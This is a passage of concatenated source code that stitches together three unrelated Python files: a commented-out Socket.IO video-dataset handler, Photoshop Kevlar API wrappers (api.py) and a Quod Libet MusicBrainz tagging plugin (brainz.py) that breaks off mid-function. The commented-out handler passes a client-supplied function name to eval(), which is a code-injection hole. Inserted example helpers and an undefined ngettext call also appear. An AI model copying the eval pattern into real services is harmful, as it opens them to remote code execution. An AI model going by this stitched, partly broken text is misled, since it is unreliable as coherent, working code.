# self.log("Socketio session on datasetsocket started")
#
# def log(self, message):
# self.logger.info("[{0}] {1}".format(self.socket.sessid, message))
#
# # def on_prepare_dataset(self,params):
# # self.log("prepare_dataset")
# # self.log("Nom {0} Path: {1}".format(params['name'],params['base_path']))
# # name = params['name']
# # base_path = params['base_path']
# # overwrite = params['overwrite']
# # overwrite_audio = params['overwrite_audio']
# # update = params['update']
# # dataset, created = Dataset.objects.get_or_create(name=name, base_path=base_path)
# # self.log(dataset.base_path)
# # self.log(dataset.audio_path)
# # self.log(dataset.video_path)
# # videos = dataset.prepare()
# # self.log("videos number {0}".format(len(videos)))
# # videos = []
# # for vid in dataset.videos.all():
# # videos.append(vid)
# # t = Thread(target=pre_vids,args=(self,videos,dataset,update,overwrite,overwrite_audio))
# # t.start()
# # self.log("Videos name's")
# # self.log(dataset.videos_name_in_folder)
# # self.log(params)
# # return True
#
# def on_get_videos_in_dataset(self,params):
# name = params['name']
# dataset = Dataset.objects.get(name=name)
# videos = dataset.video_list
# for vid in videos:
# dataset.create_video(vid)
# self.broadcast_event('list videos',{})
# return True
#
# # def on_prepare_video(self,params):
# # self.log(params)
# # videos = []
# # video = Video.objects.get(id=params['id'])
# # name = params['name']
# # base_path = params['base_path']
# # overwrite = params['overwrite']
# # overwrite_audio = params['overwrite_audio']
# # update = params['update']
# # dataset = Dataset.objects.get(name=name, base_path=base_path)
# # videos.append(video)
# # t = Thread(target=pre_vids,args=(self,videos,dataset,update,overwrite,overwrite_audio))
# # t.start()
# # self.log(params)
# # return True
#
# # def on_feature_video(self,params):
# # self.log(params)
# # videos = []
# # video = Video.objects.get(id=params['id'])
# # name = params['name']
# # base_path = params['base_path']
# # overwrite = params['overwrite']
# # dataset = Dataset.objects.get(name=name, base_path=base_path)
# # videos.append(video)
# # t = Thread(target=feature_vids,args=(self,videos,dataset,overwrite))
# # t.start()
# # self.log(params)
# # return True
# #
# # def on_feature_dataset(self,params):
# # name = params['name']
# # base_path = params['base_path']
# # overwrite = params['overwrite']
# # videos = []
# #
# # dataset = Dataset.objects.get(name=name, base_path=base_path)
# #
# # for video in dataset.videos.all():
# # videos.append(video)
# #
# # t = Thread(target=feature_vids,args=(self,videos,dataset,overwrite))
# # t.start()
# # self.log(params)
# # return True
#
# def on_arousal_video(self,params):
# self.log(params)
# videos = []
# video = Video.objects.get(id=params['id'])
# name = params['name']
# base_path = params['base_path']
# overwrite = params['overwrite']
# algos = ""
# overwrite_audio = ""
# update = ""
# dataset = Dataset.objects.get(name=name, base_path=base_path)
# videos.append(video)
# try:
# window_len = int(params['windowlen'])
# wsize = int(params['wsize'])
# wstep = int(params['wstep'])
# crest_intensity_threshold = float(params['crest_intensity_threshold'])
# beta = int(params['beta'])
# t = Thread(target=arousal_vids,args=(self,videos,dataset,update,overwrite,overwrite_audio,algos,window_len,wsize,wstep,crest_intensity_threshold,beta))
# except:
# t = Thread(target=arousal_vids,args=(self,videos,dataset,update,overwrite,overwrite_audio,algos))
#
# t.start()
# self.log(params)
# return True
# #
# # def on_arousal_dataset(self,params):
# # name = params['name']
# # base_path = params['base_path']
# # videos = []
# # overwrite = params['overwrite']
# # dataset = Dataset.objects.get(name=name, base_path=base_path)
# #
# #
# # for video in dataset.videos.all():
# # videos.append(video)
# #
# # t = Thread(target=arousal_vids,args=(self,videos,dataset,overwrite))
# # t.start()
# # # self.log(params)
# # return True
#
# #
# # def on_all_video(self,params):
# # self.log(params)
# # videos = []
# # video = Video.objects.get(id=params['id'])
# # algos = params['algos']
# # name = params['name']
# # base_path = params['base_path']
# # overwrite = params['overwrite']
# # overwrite_audio = params['overwrite_audio']
# # update = params['update']
# # dataset = Dataset.objects.get(name=name, base_path=base_path)
# # videos.append(video)
# # t = Thread(target=all_vids,args=(self,videos,dataset,update,overwrite,overwrite_audio,algos))
# # t.start()
# # return True
# #
# # def on_all_dataset(self,params):
# # name = params['name']
# # base_path = params['base_path']
# # videos = []
# # overwrite = params['overwrite']
# # overwrite_audio = params['overwrite_audio']
# # update = params['update']
# # algos = params['algos']
# # dataset = Dataset.objects.get(name=name, base_path=base_path)
# #
# #
# #
# # for video in dataset.videos.all():
# # videos.append(video)
# #
# # t = Thread(target=all_vids,args=(self,videos,dataset,update,overwrite,overwrite_audio,algos))
# # t.start()
# # self.log(params)
# # return True
#
# def on_do_this(self,params):
# self.log(params)
# videos = []
#
# algos = params['algos']
# name = params['name']
# base_path = params['base_path']
# overwrite = params['overwrite']
# overwrite_audio = params['overwrite_audio']
# update = params['update']
# dataset = Dataset.objects.get(name=name, base_path=base_path)
# if(params['id'] == -1):
# for video in dataset.videos.all():
# videos.append(video)
# else:
# video = Video.objects.get(id=params['id'])
# videos.append(video)
# t = Thread(target=eval(params['function']),args=(self,videos,dataset,update,overwrite,overwrite_audio,algos))
# t.start()
# return True
|
api.py
|
"""
Kevlar API wrappers.
https://github.com/adobe-photoshop/generator-core/wiki/Photoshop-Kevlar-API-Additions-for-Generator
"""
import json
import threading
from enum import Enum
from photoshop.protocol import ContentType
import logging
logger = logging.getLogger(__name__)
class Event(str, Enum):
"""
List of events in :py:meth:`~photoshop.PhotoshopConnection.subscribe`.
See `Kevlar API`_.
.. _Kevlar API: https://github.com/adobe-photoshop/generator-core/wiki/Photoshop-Kevlar-API-Additions-for-Generator
"""
imageChanged = 'imageChanged'
generatorMenuChanged = 'generatorMenuChanged'
generatorDocActivated = 'generatorDocActivated'
foregroundColorChanged = 'foregroundColorChanged'
backgroundColorChanged = 'backgroundColorChanged'
currentDocumentChanged = 'currentDocumentChanged'
activeViewChanged = 'activeViewChanged'
newDocumentViewCreated = 'newDocumentViewCreated'
closedDocument = 'closedDocument'
documentChanged = 'documentChanged'
colorSettingsChanged = 'colorSettingsChanged'
keyboardShortcutsChanged = 'keyboardShortcutsChanged'
quickMaskStateChanged = 'quickMaskStateChanged'
toolChanged = 'toolChanged'
workspaceChanged = 'workspaceChanged'
Asrt = 'Asrt'
idle = 'idle'
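# Small illustration (added, not part of the original module): because Event
# subclasses str, members compare equal to their plain-string names and can be
# round-tripped through the Enum constructor.
def _event_name_examples():
    assert Event('imageChanged') is Event.imageChanged
    assert Event.imageChanged == 'imageChanged'
    return [e.value for e in Event]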
def listen_event(self, event, callback):
event = Event(event)
begin = self._render('networkEventSubscribe.js.j2', dict(event=event))
with self._transaction() as txn:
txn.send(ContentType.SCRIPT_SHARED, begin.encode('utf-8'))
try:
while True:
response = txn.receive()
data = response.get('body')
if data == b'[ActionDescriptor]':
continue
data = data.split(b'\r', 1)
assert data[0].decode('utf-8') == event
result = callback(self, data[1] if len(data) > 1 else None)
if result:
break
except Exception as e:
if not isinstance(e, OSError):
logger.error('%s' % e)
return
end = self._render('networkEventUnsubscribe.js.j2', dict(event=event))
with self._transaction() as txn:
txn.send(ContentType.SCRIPT_SHARED, end.encode('utf-8'))
assert txn.receive().get('body') == b'[ActionDescriptor]'
class Kevlar(object):
"""Kevlar API wrappers."""
def subscribe(self, event, callback, block=False, **kwargs):
"""
Subscribe to changes, sends any relevant change info back on subscribing
socket.
:param event: Event name, one of :py:class:`~photoshop.Event`.
:param callback: Callable that takes two arguments:
- `conn`: :py:class:`~photoshop.PhotoshopConnection` instance.
- `data`: `bytes` data returned from Photoshop on this event. The
actual data format varies by event type.
Return value of `callback` signals termination of the current
subscription. If `callback` returns True, subscription stops.
:param block: Block until subscription finishes. default `False`.
Example::
import json
import time
def handler(conn, data):
print(json.loads(data.decode('utf-8')))
return True # This terminates subscription
with PhotoshopConnection() as conn:
conn.subscribe('imageChanged', handler)
conn.execute('documents.add()')
time.sleep(5)
"""
assert callable(callback)
thread = threading.Thread(
target=listen_event, args=(self, event, callback), daemon=True
)
self.subscribers.append(thread)
thread.start()
if block:
thread.join()
def get_document_thumbnail(
self,
document=None,
max_width=2048,
max_height=2048,
format=1,
placed_ids=None
):
"""
Send a thumbnail of a document's composite.
:param document: optional document id, uses active doc if not specified.
:param max_width: maximum width of thumbnail.
:param max_height: maximum height of thumbnail.
:param format: 1 is JPEG, 2 is pixmap (uncompressed w/ transparency).
:param placed_ids: Photoshop 16.1 and later, optional. reference smart
object(s) within the document series of "ID" from
layer:smartObject:{} or "placedID" from "image:placed:[{}]".
:return: JPEG bytes if `format` is 1, or
:py:class:`~photoshop.protocol.Pixmap` if `format` is 2.
:raise RuntimeError: if error happens in remote.
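A minimal usage sketch (illustrative only; it assumes an open
:py:class:`~photoshop.PhotoshopConnection` named ``conn`` and a made-up
output filename)::
    data = conn.get_document_thumbnail()  # JPEG bytes with the default format=1
    with open('thumbnail.jpg', 'wb') as f:
        f.write(data)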
"""
script = self._render(
'sendDocumentThumbnailToNetworkClient.js.j2', locals()
)
response = self.execute(script, receive_output=True)
assert response['content_type'] == ContentType.IMAGE
return response.get('body', {}).get('data')
def get_layer_thumbnail(
self,
document=None,
max_width=2048,
max_height=2048,
convert_rgb_profile=True,
icc_profile=None,
interpolation=None,
transform=None,
layer=None,
layer_settings=None,
image_settings=None,
include_layers=None,
clip_bounds=None,
bounds=False,
bounds_only=False,
thread=None,
layer_comp_id=None,
layer_comp_index=None,
dither=True,
color_dither=True
):
"""
Send a thumbnail of layer composite, or a range of layers, with optional
settings/transform applied.
:param document: optional document id, uses active doc if not specified.
:param max_width: maximum width of thumbnail.
:param max_height: maximum height of thumbnail.
:param placed_ids: Photoshop 16.1 and later, optional. reference smart
object(s) within the document series of "ID" from
layer:smartObject:{} or "placedID" from "image:placed:[{}]".
:param convert_rgb_profile: if True, the thumbnail is converted to the
working RGB space in "Color Settings...".
:param icc_profile: optional, Photoshop 16.1, and later.
convert to profile with this name, e.g. srgb is "sRGB IEC61966-2.1"
:param interpolation: interpolation method to use for any downscaling
necessary to fit into requested "width"/"height".
supported interpolation types (from image size dialog/action):
- "nearestNeighbor"
- "bilinear"
- "bicubic"
- "bicubicSmoother"
- "bicubicSharper"
- "bicubicAutomatic"
- "preserveDetailsUpscale"
- "automaticInterpolation"
default is "bicubicSharper".
:param transform: scale/transform layers by this before building
thumbnails (scales original source data, such as smart obj/vectors).
if this is specified, the thumbnail is built on a worker thread in
Photoshop.
Example::
transform = {
'scale_x': 100.0,
'scale_y': 100.0,
'interpolation': 'bicubicSharper',
'dumb_scaling': True
}
- `scale_x`: percent, 100.0 == 1x
- `scale_y`: percent, 100.0 == 1x
- `interpolation`: Optional, similar to interpolation above,
but this is just used for the transform step (not the thumbnail),
it defaults to Photoshop's "Image Interpolation" preference.
- `dumb_scaling`: For PS >= 14.2. Make smart shapes scale like
non-smart shapes (round rect corners will scale), default is
False.
:param layer: `None` for currently selected layers in photoshop, or
specify one of the following:
- integer ID of a single layer, e.g. `0`.
- (`first`, `last`) tuple of layer IDs, e.g., (1, 6).
:param layer_settings: Action list to modify the layer before the
thumbnail is retrieved. This option is available when `layer` param
is specified by tuple range. The argument should be list of dict
with the following keys:
- `enabled`: make the layer visible/invisible.
- `blendOptions`: blending settings to use.
- `layerEffects`: fx settings to use.
- `offset`: integer offset of layer in dict.
- `vectorMask`: vector mask to apply in dict.
- `FXRefPoint`: effect reference point.
Example::
[
{
'enabled': True,
'blendOptions': [],
'layerEffects': [],
'offset': {
'horizontal': 0,
'vertical': 0
},
'vectorMask': {
'enabled': False,
'offset': {
},
'invert': False,
},
'FXRefPoint': {
'horizontal': 0,
'vertical': 0
}
}
]
:param image_settings:
:param include_layers: include additional layers to the requested layer.
dict with one or more of the following keys.
- `adjustors`: adjustors above the layer, default is `visible`.
- `ancestors`: enclosing groups (includes group blending, fx, masks
), default is `all`. `visible` and `all` incorporate any blending
parameters/masks of the ancestor groups. `visible` returns an
empty thumbnail for any layer inside an invisible group. `none`
substitutes default groups for any groups around the layer.
- `children`: if layer is a group (includes group blending, fx,
masks), default is `visible`.
- `clipbase`: clip base if layer is clipped. The clip base is a
layer that a clipped layer is clipped to, default is `all`.
- `clipped`: clipped layers if layer is clip base, default is
`visible`.
Values are one of `'all'`, `'none'`, or `'visible'`.
- `all`: include all layers of this type (force them visible).
- `none`: include no layers of this type.
- `visible`: include visible layers of this type.
Example::
{
'adjustors': 'none',
'children': 'all',
}
:param clip_bounds: clip the layer thumbnail to the document canvas
bounds if specified. Can specify `True` to bound to document size,
or specify tuple of (`top`, `left`, `right`, `bottom`).
:param bounds: return the thumbnail bounds as JSON on same transaction.
(default is False).
:param bounds_only: Just return the thumbnail bounds as JSON on same
transaction. (no thumbnail data) (default is false).
:param thread: build the thumbnail on a thread. By default, the
thumbnail is threaded if there is a "transform", otherwise it is
done on the main thread unless a user event occurs, then it is
cancelled, and restarted on a thread `thread` can be used to
override the default (either force the thumb to be started on the
main thread or a background thread) it may help performance if you
know that the thumbnail is either quick (best done on main thread)
or slow (best done on background) there is a slight
memory/performance penalty for threading in that the layer data
must be copied before it is threaded.
:param layer_comp_id: layer comp id to use (this comp is temporarily
applied before getting thumbnail).
:param layer_comp_index: layer comp index to use (this comp is
temporarily applied before getting thumbnail).
:param dither: 15.0 and later. If
1) `dither` is true
2) and either `color_dither` is false, or `dither` is
checked in the global color settings (Color Settings... in
Photoshop)
3) and any color/depth conversion would be “lossy” (16 to 8 bit,
CMYK to RGB, etc),
then dithering will occur, otherwise there will be no dithering.
:param color_dither: see above.
:return: :py:class:`~photoshop.protocol.Pixmap` or `None`.
:raise RuntimeError: if error happens in remote.
.. note:: "interpolation", "transform", "bounds", "boundsOnly", and
"thread" are supported in background-only (layer-less) documents
but only in version 15.0 and later. "layerID" should be 0 in that
case. The other layer-related settings are ignored as there are no
layers.
.. warning:: if `layer` tuple range includes a group layer, it must
include the corresponding hidden "divider" layer at the bottom of
the group (and vice-versa). The range can also just include layers
inside a group with no group layers at all.
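A minimal call sketch (illustrative only; it assumes an open connection
``conn`` and a hypothetical layer id of 2)::
    # Returns a Pixmap, or None if no thumbnail could be produced.
    pixmap = conn.get_layer_thumbnail(layer=2, max_width=512, max_height=512)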
"""
script = self._render(
'sendLayerThumbnailToNetworkClient.js.j2', locals()
)
response = self.execute(script, receive_output=True)
assert response['content_type'] == ContentType.IMAGE
return response.get('body', {}).get('data')
def get_layer_shape(
self, document=None, layer=None, version='1.0.0', placed_ids=None
):
"""
Return path/fill/strokeStyle for a shape layer(s).
:param document: optional document id, uses active doc if not specified.
:param placed_ids: Photoshop 16.1 and later, optional. reference smart
object(s) within the document series of "ID" from
layer:smartObject:{} or "placedID" from "image:placed:[{}]".
:param layer: `None` for currently selected layers in photoshop, or
specify one of the following:
- integer ID of a single layer, e.g. `0`.
- (`first`, `last`) tuple of layer IDs, e.g., (1, 6).
:param version: format version. Valid versions are 1.0.0 in 14.1, and
1.0, 1.0.0, 1.1, or 1.1.0 in Photoshop 14.2
:return: `dict` of the following schema, or `None` if no valid layer is
specified.
Schema:
.. code-block:: none
{"path":
{"pathComponents": // arrays of paths to be filled and boolean operators
[{"shapeOperation": ("intersect"/"add"/"subtract"/"xor")
"subpathListKey":[ //list of subpath objects that make up the component
{"closedSubpath":true, // (if subpath is closed)
"points": [{" // array of knot objects (anchor and control points)
anchor:[x,y] //point on path
forward:[x1,y1] //forward bezier control
backward:[x2,y2] //backward bezier control
}, //next knot...
...]
"origin":{"origin": ("ellipse"/"rect"/"roundedrect"/"line"/"unknown")
"radii": [r1,r2,r3,r4], //radii for rounded rect if any
"bounds":["top":top,"left":left,"right":right,"bottom":bottom], //bounds of entire path
"defaultFill":true/false}, //whether path starts out filled or not
"fill":
{"color":{"red":red,"green":green,"blue":blue},"class":"solidColorLayer"}
//or
{"gradient":{(gradient object)},"class":"gradientLayer"}
//or
{"pattern":{(pattern object)},"class":"patternLayer"}
"strokeStyle":
{(strokeStyle object)}
}
Example::
{"path":{"pathComponents":
[{"shapeOperation":"add",
"subpathListKey":[
{"closedSubpath":true,
"points": [{"anchor":[234.5,36],"forward":[307.125,36],"backward":[161.875,36]},
{"anchor":[366,167],"forward":[366,239.349],"backward":[366,94.651]},
{"anchor":[234.5,298],"forward":[161.875,298],"backward":[307.125,298]},
{"anchor":[103,167],"forward":[103,94.651],"backward":[103,239.349]}]
}],
"origin":{"origin":"ellipse","bounds":[35,102,299,367]}
}],
"bounds":[35,102,299,367],
"defaultFill":false},
"fill":{"color":{"red":0,"green":0,"blue":0},"class":"solidColorLayer"}
}
:raise RuntimeError: if error happens in remote.
"""
script = self._render('sendLayerShapeToNetworkClient.js.j2', locals())
response = self.execute(script, receive_output=True)
assert response['content_type'] == ContentType.SCRIPT
return json.loads(response.get('body', b'{}').decode('utf-8'))
def get_document_info(
self,
version=None,
document=None,
placed_ids=None,
layer=None,
expand_smart_objects=False,
get_text_styles=False,
get_full_text_styles=False,
get_default_layer_effect=False,
get_comp_layer_settings=False,
get_path_data=False,
image_info=None,
comp_info=None,
layer_info=True,
include_ancestors=True
):
"""
Return complete document info in JSON format.
:param version: optional requested version (you always get the current
version back, but this does a sanity check, and errors on an
incompatible version). Example: '1.4.0'.
:param document: optional document id, uses active doc if not specified.
        :param placed_ids: Photoshop 16.1 and later, optional. Reference smart
            object(s) within the document; a series of "ID" from
            layer:smartObject:{} or "placedID" from "image:placed:[{}]".
:param layer: `None` for all layers in photoshop, or
specify one of the following:
- integer ID of a single layer, e.g. `0`.
- (`first`, `last`) tuple of layer IDs, e.g., (1, 6).
- `'selected'` for currently selected layers.
:param expand_smart_objects: default is false, recursively get doc info
for any smart objects. can be slow.
:param get_text_styles: default is false, return more detailed text
info. can be slow.
:param get_full_text_styles: default is false, return all text
information (getTextStyles must also be true).
:param get_default_layer_effect: default is false, return all layer fx
even if they are disabled.
:param get_comp_layer_settings: default is false, enumerate layer
settings in layer comps.
:param get_path_data: default is false, return path control points for
shapes.
:param image_info: return image-wide info (size, resolution etc.),
default is `layer` != 'selected'.
        :param comp_info: return comp info in the "comps" array, default is
            `layer` != 'selected'.
:param layer_info: return layer info in "layers" array, default is true.
:param include_ancestors: 16.1 and later, include surrounding layer
groups if doing selected layers/range/single layer id. default is
true. should only be used with single layers (otherwise grouping
may not be accurate).
:return: `dict`.
:raise RuntimeError: if error happens in remote.
"""
# TODO: Implement whichInfo option.
script = self._render(
'sendDocumentInfoToNetworkClient.js.j2', locals()
)
response = self.execute(script, receive_output=True)
assert response['content_type'] == ContentType.SCRIPT
return json.loads(response.get('body', b'{}').decode('utf-8'))
def get_document_stream(
self,
document=None,
placed_ids=None,
placed_id=None,
layer=None,
position=None,
size=None,
path_only=None
):
"""
Get the file info and file stream for a smart object.
:param document: optional document id, uses active doc if not specified.
        :param placed_ids: Photoshop 16.1 and later, optional. Reference smart
            object(s) within the document; a series of "ID" from
            layer:smartObject:{} or "placedID" from "image:placed:[{}]".
:param placed_id: return file for smart object with this placed id ("ID"
from layer:smartObject:{} or "placedID" from "image:placed:[{}]").
        :param layer: when the integer ID of a single layer is specified,
            e.g. `0`, return the file for the smart object with this layer
            id. When both `placed_id` and `layer` are `None`, return the
            placed smart object stream for the selected layers.
:param position: offset into file (defaults to 0).
:param size: number of bytes to return (defaults to all bytes).
:param path_only: instead of returning the file stream back over the
wire, write it to a file local to the server, and return the path as
a string argument in the JSON part of the FileStream Reply.
:return: `dict` with the following fields:
- `mimeFormat`: mime string.
- `position` : position of file data returned.
- `size` : number of file bytes returned.
- `fullSize` : total number of bytes in file.
            - `path` : string, server-local path to the file (if `path_only`
              was set to true in the request).
- `data`: actual data in bytes. if `path` is True, this is empty.
:raise RuntimeError: if error happens in remote.
        .. note:: The maximum size returned by PS is 2 GB. If you have a
            smart object bigger than 2 GB, you need to use the position/size
            format to return it in chunks, or the path format to write it to
            a temp file.
Document stream/attributes are returned as a FileStream Reply.
"""
script = self._render(
'sendDocumentStreamToNetworkClient.js.j2', locals()
)
response = self.execute(script, receive_output=True)
assert response['content_type'] == ContentType.FILE_STREAM
return response.get('body')
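    # --- Illustrative usage sketches (not part of the library) ---
    # The rest of the owning class is not shown in this excerpt, and the 'name' key read
    # below is an assumption; only get_document_info()/get_document_stream() and the
    # documented "layers"/"data" fields come from the methods above.
    def _example_list_layer_names(self):
        """Sketch: print the name of every layer in the active document."""
        info = self.get_document_info(layer_info=True, image_info=False, comp_info=False)
        for layer in info.get('layers', []):
            print(layer.get('name'))
    def _example_save_smart_object(self, layer_id, out_path):
        """Sketch: dump the embedded file of a smart-object layer to disk."""
        stream = self.get_document_stream(layer=layer_id)
        with open(out_path, 'wb') as fh:
            fh.write(stream.get('data', b''))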
|
brainz.py
|
# brainz.py - Quod Libet plugin to tag files from MusicBrainz automatically
# Copyright 2005-2010 Joshua Kwan <joshk@triplehelix.org>,
# Michael Ball <michael.ball@gmail.com>,
# Steven Robertson <steven@strobe.cc>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation
import os
import re
import threading
import time
from gi.repository import Gtk, GObject, Pango, GLib
try:
from musicbrainz2 import webservice as ws
from musicbrainz2.utils import extractUuid
except ImportError as e:
from quodlibet import plugins
raise (plugins.MissingModulePluginException("musicbrainz2") if
hasattr(plugins, "MissingModulePluginException") else e)
from quodlibet import config, util
from quodlibet.qltk.ccb import ConfigCheckButton
from quodlibet.plugins.songsmenu import SongsMenuPlugin
from quodlibet.qltk.views import HintedTreeView, MultiDragTreeView
VARIOUS_ARTISTS_ARTISTID = '89ad4ac3-39f7-470e-963a-56509c546377'
def get_artist(album):
"""Returns a single artist likely to be the MB AlbumArtist, or None."""
for tag in ["albumartist", "artist", "performer"]:
names = set()
for song in album:
for single in filter(None, song.get(tag, "").split("\n")):
names.add(single)
if len(names) == 1:
return names.pop()
elif len(names) > 1:
return None
return None
def get_trackcount(album):
"""Returns the track count, hammered into submission."""
parts = []
for song in album:
parts.extend(song.get("tracknumber", "0").split("/"))
max_count = len(album)
for part in parts:
try:
tracks = int(part)
except ValueError:
continue
max_count = max(max_count, tracks)
return max_count
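# Illustrative sketch (not part of the plugin): a minimal check of get_trackcount()
# using plain dicts in place of Quod Libet song objects (an assumption; real songs
# expose a compatible .get()).
def _example_trackcount():
    fake_album = [{"tracknumber": "3/12"}, {"tracknumber": "4"}]
    # len(fake_album) is 2, but the "/12" total wins, so this returns 12.
    return get_trackcount(fake_album)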
def config_get(key, default=''):
return config.getboolean('plugins', 'brainz_' + key, default)
def dialog_get_widget_for_stockid(dialog, stockid):
for child in dialog.get_action_area().get_children():
if child.get_label() == stockid:
return child
class ResultTreeView(HintedTreeView, MultiDragTreeView):
"""The result treeview. The model only stores local tracks; info about
remote results is pulled from self.remote_album."""
def __name_datafunc(self, col, cell, model, itr, data):
song = model[itr][0]
if song:
cell.set_property('text', os.path.basename(song.get("~filename")))
else:
cell.set_property('text', '')
def __track_datafunc(self, col, cell, model, itr, data):
idx = model.get_path(itr)[0]
if idx >= len(self.remote_album):
cell.set_property('text', '')
else:
cell.set_property('text', str(idx + 1))
def __title_datafunc(self, col, cell, model, itr, data):
idx = model.get_path(itr)[0]
if idx >= len(self.remote_album):
cell.set_property('text', '')
else:
cell.set_property('text', self.remote_album[idx].title)
def __artist_datafunc(self, col, cell, model, itr, data):
idx = model.get_path(itr)[0]
if idx >= len(self.remote_album) or not self.remote_album[idx].artist:
cell.set_property('text', '')
else:
cell.set_property('text', self.remote_album[idx].artist.name)
def __init__(self, album):
self.album = album
self.remote_album = []
self.model = Gtk.ListStore(object)
for song in album:
self.model.append([song])
super(ResultTreeView, self).__init__(self.model)
self.set_headers_clickable(True)
self.set_rules_hint(True)
self.set_reorderable(True)
self.get_selection().set_mode(Gtk.SelectionMode.MULTIPLE)
cols = [
('Filename', self.__name_datafunc, True),
('Track', self.__track_datafunc, False),
('Title', self.__title_datafunc, True),
('Artist', self.__artist_datafunc, True),
]
for title, func, resize in cols:
render = Gtk.CellRendererText()
render.set_property('ellipsize', Pango.EllipsizeMode.END)
col = Gtk.TreeViewColumn(title, render)
col.set_cell_data_func(render, func)
col.set_resizable(resize)
col.set_expand(resize)
self.append_column(col)
def update_remote_album(self, remote_album):
"""Updates the TreeView, handling results with a different number of
tracks than the album being tagged."""
for i in range(len(self.model), len(remote_album)):
self.model.append((None, ))
for i in range(len(self.model), len(remote_album), -1):
if self.model[-1][0] is not None:
break
itr = self.model.get_iter_from_string(str(len(self.model) - 1))
self.model.remove(itr)
self.remote_album = remote_album
        # any() rather than bool(filter(...)): a filter object is always truthy in Python 3
        has_artists = any(t.artist for t in remote_album)
col = self.get_column(3)
# sometimes gets called after the treeview is already gone
if not col:
return
col.set_visible(has_artists)
self.columns_autosize()
self.queue_draw()
class ResultComboBox(Gtk.ComboBox):
"""Formatted picker for different Result entries."""
def __init__(self, model):
super(ResultComboBox, self).__init__(model=model)
render = Gtk.CellRendererText()
render.set_fixed_height_from_font(2)
def celldata(layout, cell, model, iter, data):
release = model[iter][0]
if not release:
return
date = release.getEarliestReleaseDate()
if date:
date = '%s, ' % date
else:
date = ''
markup = "<b>%s</b>\n%s - %s%s tracks" % (
util.escape(release.title),
util.escape(release.artist.name),
date, release.tracksCount)
cell.set_property('markup', markup)
self.pack_start(render, True)
self.set_cell_data_func(render, celldata, None)
class ReleaseEventComboBox(Gtk.HBox):
"""A ComboBox for picking a release event."""
def __init__(self):
super(ReleaseEventComboBox, self).__init__()
self.model = Gtk.ListStore(object, str)
self.combo = Gtk.ComboBox(model=self.model)
render = Gtk.CellRendererText()
self.combo.pack_start(render, True)
self.combo.add_attribute(render, "markup", 1)
self.combo.set_sensitive(False)
self.label = Gtk.Label(label="_Release:", use_underline=True)
self.label.set_use_underline(True)
self.label.set_mnemonic_widget(self.combo)
self.pack_start(self.label, False, True, 0)
self.pack_start(self.combo, True, True, 0)
def update(self, release):
self.model.clear()
events = release.getReleaseEvents()
# The catalog number is the most important of these fields, as it's
# the source for the 'labelid' tag, which we'll use until MB NGS is
# up and running to deal with multi-disc albums properly. We sort to
# find the earliest release with a catalog number.
events.sort(key=lambda e: (bool(not e.getCatalogNumber()),
e.getDate() or '9999-12-31'))
for rel_event in events:
text = '%s %s: <b>%s</b> <i>(%s)</i>' % (
rel_event.getDate() or '', rel_event.getLabel() or '',
rel_event.getCatalogNumber(), rel_event.getCountry())
self.model.append((rel_event, text))
if len(events) > 0:
self.combo.set_active(0)
self.combo.set_sensitive((len(events) > 0))
text = ngettext("%d _release:", "%d _releases:", len(events))
self.label.set_text(text % len(events))
self.label.set_use_underline(True)
def get_release_event(self):
itr = self.combo.get_active_iter()
if itr:
return self.model[itr][0]
else:
return None
class QueryThread(object):
"""Daemon thread which does HTTP retries and avoids flooding."""
def __init__(self):
self.running = True
self.queue = []
thread = threading.Thread(target=self.__run)
thread.daemon = True
thread.start()
def add(self, callback, func, *args, **kwargs):
"""Add a func to be evaluated in a background thread.
Callback will be called with the result from the main thread."""
self.queue.append((callback, func, args, kwargs))
def stop(self):
"""Stop the background thread."""
self.running = False
def __run(self):
while self.running:
if self.queue:
callback, func, args, kwargs = self.queue.pop(0)
try:
res = func(*args, **kwargs)
except:
time.sleep(2)
try:
res = func(*args, **kwargs)
except:
res = None
def idle_check(cb, res):
if self.running:
cb(res)
GLib.idle_add(idle_check, callback, res)
time.sleep(1)
class SearchWindow(Gtk.Dialog):
def __save(self, widget=None, response=None):
"""Writes values to Song objects."""
self._qthread.stop()
if response != Gtk.ResponseType.ACCEPT:
self.destroy()
return
album = self.current_release
shared = {}
shared['album'] = album.title
if config_get('split_disc', True):
m = re.match(r'(.*) \(disc (.*?)\)$', album.title)
if m:
shared['album'] = m.group(1)
disc = m.group(2).split(': ', 1)
shared['discnumber'] = disc[0]
if len(disc) > 1:
shared['discsubtitle'] = disc[1]
relevt = self.release_combo.get_release_event()
shared['date'] = relevt and relevt.getDate() or ''
if shared['date'] and config_get('year_only', False):
shared['date'] = shared['date'].split('-')[0]
if config_get('labelid', True):
if relevt and relevt.getCatalogNumber():
shared['labelid'] = relevt.getCatalogNumber()
if not album.isSingleArtistRelease():
if (config_get('albumartist', True)
and extractUuid(album.artist.id) != VARIOUS_ARTISTS_ARTISTID):
shared['albumartist'] = album.artist.name
if config_get('artist_sort', False) and \
album.artist.sortName != album.artist.name:
shared['albumartistsort'] = album.artist.sortName
if config_get('standard', True):
shared['musicbrainz_albumartistid'] = extractUuid(album.artist.id)
shared['musicbrainz_albumid'] = extractUuid(album.id)
for idx, (song, ) in enumerate(self.result_treeview.model):
if song is None:
continue
song.update(shared)
if idx >= len(album.tracks):
continue
track = album.tracks[idx]
song['title'] = track.title
song['tracknumber'] = '%d/%d' % (idx + 1,
max(len(album.tracks), len(self.result_treeview.model)))
if config_get('standard', True):
song['musicbrainz_trackid'] = extractUuid(track.id)
if album.isSingleArtistRelease() or not track.artist:
song['artist'] = album.artist.name
if config_get('artist_sort', False) and \
album.artist.sortName != album.artist.name:
song['artistsort'] = album.artist.sortName
else:
song['artist'] = track.artist.name
if config_get('artist_sort', False) and \
track.artist.sortName != track.artist.name:
song['artistsort'] = track.artist.sortName
if config_get('standard', True):
song['musicbrainz_artistid'] = extractUuid(track.artist.id)
if config_get('split_feat', False):
feats = re.findall(r' \(feat\. (.*?)\)', track.title)
if feats:
feat = []
for value in feats:
values = value.split(', ')
if len(values) > 1:
values += values.pop().split(' & ')
feat += values
song['performer'] = '\n'.join(feat)
song['title'] = re.sub(r' \(feat\. .*?\)', '', track.title)
self.destroy()
def __do_query(self, *args):
"""Search for album using the query text."""
query = self.search_query.get_text()
if not query:
self.result_label.set_markup("<b>Please enter a query.</b>")
self.search_button.set_sensitive(True)
return
self.result_label.set_markup("<i>Searching...</i>")
filt = ws.ReleaseFilter(query=query)
self._qthread.add(self.__process_results,
self._query.getReleases, filt)
def __process_results(self, results):
"""Callback for search query completion."""
self._resultlist.clear()
self.search_button.set_sensitive(True)
if results is None:
